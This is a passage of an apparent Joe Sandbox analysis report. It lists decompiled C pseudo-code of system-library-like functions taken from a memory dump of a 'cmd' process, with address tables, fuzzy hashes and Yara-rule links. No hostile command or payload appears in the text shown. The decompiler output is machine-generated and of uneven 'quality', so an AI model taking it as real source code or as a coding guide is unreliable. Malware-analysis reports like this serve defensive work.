					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x037037fa
0x037037fc
0x03703805
0x03703808
0x03703808
0x03703814
0x03703818
0x03703846
0x03703848
0x0370384b
0x0370384b
0x03703852
0x00000000
0x03703854
0x03703856
0x00000000
0x00000000
0x03703863
0x00000000
0x03703863
0x0370381a
0x0370381a
0x0370381f
0x0370386e
0x0370386e
0x03703871
0x03703873
0x03703873
0x03703868
0x00000000
0x03703868
0x03703821
0x03703826
0x00000000
0x00000000
0x03703828
0x0370382a
0x03703841
0x00000000
0x03703841

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f94986930841b839371992cdcb16df0e674db98ff4792b22f99a3249043980f5
Instruction ID: 2919affd1d40dd1e34d60726f30a27c17437fd544758ebf1aa6710ff3102e924
Opcode Fuzzy Hash: f94986930841b839371992cdcb16df0e674db98ff4792b22f99a3249043980f5
Instruction Fuzzy Hash: 1601D67A901610DBE33BDB199980E26BBFADF85B5171940EDE8458F2D0D730C801D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 036F002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E036E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E036E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E036E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E036E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x036f0032
0x036f0037
0x036f0043
0x03734b3a
0x036f0049
0x036f0049
0x036f0049
0x036f004e
0x036f0053
0x03734b48
0x03734b5a
0x03734b4a
0x03734b53
0x03734b53
0x03734b5f
0x00000000
0x03734b61
0x00000000
0x03734b61
0x036f0059
0x036f0059
0x036f0060
0x03734b6f
0x03734b6f
0x036f0069
0x03734b83
0x00000000
0x00000000
0x03734b90
0x03734b9b
0x03734b9b
0x03734ba4
0x00000000
0x00000000
0x03734baa
0x00000000
0x036f006f
0x036f006f
0x00000000
0x036f006f
0x036f0069

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: 4ea304390a56ecf9627362ef7096436be57fc221678a2e458731093a814505a2
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: A4110036202680CFD726CB6AD944B3577D8EF42754F0D00E0DE048BBA3E338C882CA64

Uniqueness

Uniqueness Score: -1.00%

Function 036D766D Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E036D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E036FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E036FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L036E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x036d7672
0x036d767f
0x036d7689
0x036d76de
0x036d76de
0x036d768b
0x036d7691
0x036d7693
0x036d7697
0x00000000
0x036d7699
0x036d76a8
0x00000000
0x036d76aa
0x036d76ad
0x036d76b1
0x00000000
0x036d76b3
0x036d76b3
0x036d76b5
0x036d76ba
0x036d76bc
0x036d76bc
0x036d76c0
0x00000000
0x036d76c2
0x036d76ce
0x036d76ce
0x036d76c0
0x036d76b1
0x036d76a8
0x036d7697
0x036d76d9

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 771b39209471d8ab319052c81cf50cf3386587a57fc2712596136efd2566b46c
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 38018832B00159AFC720DE5ECD41E5BB7ADEBC4A60B240528B908CF250EA30DD1187A9

Uniqueness

Uniqueness Score: -1.00%

Function 036C9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E036C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x37b85ec;
				E036E2280(_t48, 0x37b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E036DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x37b538c; // 0x77576848
					if( *_t84 != 0x37b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x379f6e8);
						E0371D0E8(0x37b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E037988F5(_t80, _t85, 0x37b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x37b86c0; // 0x2f107b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x37b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E036E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E037988F5(0x37b85ec, _t85, 0x37b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0370AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x37bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x37b84c0;
																			if(_t82 >=  *0x37b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03799063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E036C922A(_t99);
										_t64 = E036E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03798B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x37b86c0; // 0x2f107b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x37b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x37b86bc;
													_t87 = 0x37b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E036C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x37b86c4;
												_t87 = 0x37b86c0;
												L27:
												E036F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0371D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x37b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x37b538c = _t51;
						goto L6;
					}
				}
			}

0x036c9082
0x036c9083
0x036c9084
0x036c9085
0x036c9087
0x036c9096
0x036c9098
0x036c9098
0x036c909e
0x036c90a8
0x036c90e7
0x036c90e7
0x036c90aa
0x036c90b0
0x036c90b7
0x036c90bd
0x036c90dd
0x036c90e6
0x036c90bf
0x036c90bf
0x036c90c7
0x036c90cf
0x036c90f1
0x036c90f2
0x036c90f4
0x036c90f5
0x036c90f6
0x036c90f7
0x036c90f8
0x036c90f9
0x036c90fa
0x036c90fb
0x036c90fc
0x036c90fd
0x036c90fe
0x036c90ff
0x036c9100
0x036c9102
0x036c9107
0x036c910c
0x036c9110
0x036c9113
0x036c9115
0x036c9136
0x036c913f
0x036c9143
0x037237e4
0x037237e4
0x036c9117
0x036c9117
0x036c911d
0x00000000
0x036c911f
0x036c911f
0x036c9125
0x00000000
0x036c9127
0x036c912d
0x036c9130
0x036c9134
0x036c9158
0x036c915d
0x036c9161
0x036c9168
0x03723715
0x036c916e
0x036c916e
0x036c9175
0x036c9177
0x036c917e
0x036c917f
0x036c9182
0x036c9182
0x036c9187
0x036c9187
0x036c918a
0x036c918d
0x036c918f
0x036c9192
0x036c9195
0x036c9198
0x036c9198
0x036c9198
0x036c919a
0x00000000
0x00000000
0x0372371f
0x03723721
0x03723727
0x0372372f
0x03723733
0x03723735
0x03723738
0x0372373b
0x0372373d
0x03723740
0x00000000
0x03723746
0x03723746
0x03723749
0x00000000
0x0372374f
0x0372374f
0x03723751
0x03723757
0x03723759
0x0372375c
0x0372375c
0x0372375e
0x0372375e
0x03723761
0x03723764
0x00000000
0x00000000
0x03723766
0x03723768
0x037237a3
0x037237a3
0x037237a5
0x037237a7
0x037237ad
0x037237b0
0x037237b2
0x037237bc
0x037237c2
0x037237c2
0x037237b2
0x036c9187
0x036c9187
0x036c918a
0x036c918d
0x036c918f
0x036c9192
0x036c9195
0x00000000
0x036c9195
0x00000000
0x0372376a
0x0372376a
0x0372376a
0x0372376c
0x0372376c
0x0372376f
0x03723775
0x00000000
0x00000000
0x03723777
0x03723779
0x03723782
0x03723787
0x03723789
0x03723790
0x03723790
0x0372378b
0x0372378b
0x0372378b
0x03723792
0x03723795
0x00000000
0x03723795
0x00000000
0x03723779
0x03723798
0x00000000
0x03723798
0x00000000
0x03723768
0x0372379b
0x0372379b
0x03723751
0x03723749
0x00000000
0x03723740
0x036c91a0
0x036c91a3
0x036c91a9
0x036c91b0
0x00000000
0x036c91b0
0x036c9187
0x036c91b4
0x036c91b4
0x036c91bb
0x036c91c0
0x036c91c5
0x036c91c7
0x037237da
0x036c91cd
0x036c91cd
0x036c91cd
0x036c91d2
0x036c91d5
0x036c9239
0x036c9239
0x036c91d7
0x036c91db
0x036c91e1
0x036c91e7
0x036c91fd
0x036c9203
0x036c921e
0x036c9223
0x00000000
0x036c9205
0x036c9205
0x036c9208
0x036c920c
0x036c9214
0x036c9214
0x036c920c
0x036c91e9
0x036c91e9
0x036c91ee
0x036c91f3
0x036c91f3
0x036c91f3
0x036c91e7
0x00000000
0x00000000
0x00000000
0x036c9134
0x036c9125
0x036c911d
0x036c914e
0x036c90d1
0x036c90d1
0x036c90d3
0x036c90d6
0x036c90d8
0x00000000
0x036c90d8
0x036c90cf

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a9b10eaa1e2a9e2ba8979d38b10b8ab00686a10a114bb4b98e2b8a995415213
Instruction ID: 6c4f5e93cb1f3a7aaba9ad9443199d4f50735feb739720416f405a70c6bdd9cf
Opcode Fuzzy Hash: 0a9b10eaa1e2a9e2ba8979d38b10b8ab00686a10a114bb4b98e2b8a995415213
Instruction Fuzzy Hash: 8D01DC72A212448FD328DF08D940B22BBF9EB86325F29806EE101CF791D374DC41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0375C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0375C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03709910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E037095B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E037095D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E037095D0();
				return L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0375c458
0x0375c45d
0x0375c466
0x0375c468
0x0375c469
0x0375c46a
0x0375c46b
0x0375c46e
0x0375c46f
0x0375c471
0x0375c476
0x0375c476
0x0375c47c
0x0375c47e
0x0375c480
0x0375c480
0x0375c483
0x0375c484
0x0375c486
0x0375c488
0x0375c48f
0x0375c491
0x0375c493
0x0375c493
0x0375c48f
0x0375c498
0x0375c49e
0x0375c4ad
0x0375c4ad
0x0375c4b2
0x0375c4b4
0x0375c4cd

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: 8d07b616b71a55c77caf4b4793a42d3592106e21e520999609a3471ad8bc0ae3
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 7401CC76140606FFDA26EF65CC84E62FBADFB45391F144129F2144A5A0CB22ACA0CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 03794015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E03794015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E036E2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E036E2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x37b86ac);
					E036CF900(0x37b86d4, _t28);
					E036DFFB0(0x37b86ac, _t28, 0x37b86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E036DFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x0379401a
0x0379401e
0x03794023
0x03794028
0x03794029
0x0379402b
0x0379402f
0x03794043
0x03794046
0x03794051
0x03794057
0x0379405f
0x03794062
0x03794067
0x0379406f
0x0379407c
0x0379407c
0x0379408c
0x0379408c
0x03794097

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1468c6f31f076b563669c4f7569a09bce6b259a0e5d153d2db66e4040e92dd4
Instruction ID: f7e0203bbfca2e3676ea058b0306ace7a40c0fd8354e9a31b02bc75f9fb11c42
Opcode Fuzzy Hash: d1468c6f31f076b563669c4f7569a09bce6b259a0e5d153d2db66e4040e92dd4
Instruction Fuzzy Hash: C001DF76202A887FD614EB69CD80E13B7ACEB49660B000629F5088FA11CB24EC11C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 0378138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0378138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x37bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0370FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0370B640(E03709AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0378138a
0x0378138a
0x03781399
0x037813a3
0x037813a8
0x037813aa
0x037813b5
0x037813bb
0x037813c3
0x037813c6
0x037813c9
0x037813d4
0x037813e6
0x037813d6
0x037813df
0x037813df
0x037813f1
0x037813f2
0x037813f4
0x037813f9
0x0378140e

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878f74e0da3c9db1c79069c06a1d7f58d23c71d8c0a4f92dc37836f3bdb29735
Instruction ID: 12da8aa98ecc1185e3723e741c71be146b43fd2c87bf02b7582964147ae1cfb0
Opcode Fuzzy Hash: 878f74e0da3c9db1c79069c06a1d7f58d23c71d8c0a4f92dc37836f3bdb29735
Instruction Fuzzy Hash: 56015275A01318EFCB14EFA9D885FAEB7B8EF45710F404066F904EB681D674DA01C794

Uniqueness

Uniqueness Score: -1.00%

Function 037814FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E037814FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x37bd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0370FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E036E7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0370B640(E03709AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x037814fb
0x037814fb
0x0378150a
0x03781514
0x03781519
0x0378151b
0x03781526
0x0378152c
0x03781534
0x03781537
0x0378153a
0x03781545
0x03781557
0x03781547
0x03781550
0x03781550
0x03781562
0x03781563
0x03781565
0x0378156a
0x0378157f

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e00b3644a535b0d88af88364b2f2644fd38318e5af6419a09eb3aa23063c767
Instruction ID: ad75afafb5ffa3da6ba3465e0e234f62590ff80e7572a69bf8591492743afd8b
Opcode Fuzzy Hash: 3e00b3644a535b0d88af88364b2f2644fd38318e5af6419a09eb3aa23063c767
Instruction Fuzzy Hash: 29018C75A01248EBCB10EFA8D845EAEBBB8EF45700F40406AF904EB380DA74DA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036C58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E036C58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x37bd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x36a5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E036C5943() != 0 &&  *0x37b5320 > 5) {
					E03747B5E( &_v44, _t27);
					_t22 =  &_v28;
					E03747B5E( &_v28, _t28);
					_t11 = E03747B9C(0x37b5320, 0x36abf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0370B640(_t11, _t17, _v8 ^ _t29, 0x36abf15, _t27, _t28);
			}

0x036c58fb
0x036c58fe
0x036c5906
0x036c590a
0x036c593c
0x036c593c
0x036c590c
0x036c590c
0x036c5911
0x00000000
0x036c5913
0x036c5913
0x036c5913
0x036c5911
0x036c591d
0x03721035
0x0372103c
0x0372103f
0x03721056
0x03721056
0x036c593b

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4887f5ffc7993edbacaceb5a2118bbf4447699bbebcb982014185b24361ecb71
Instruction ID: 62875224d4e2b5f6719f1fb4269c9fa20519fe57665fdf1c49de5d83579ac376
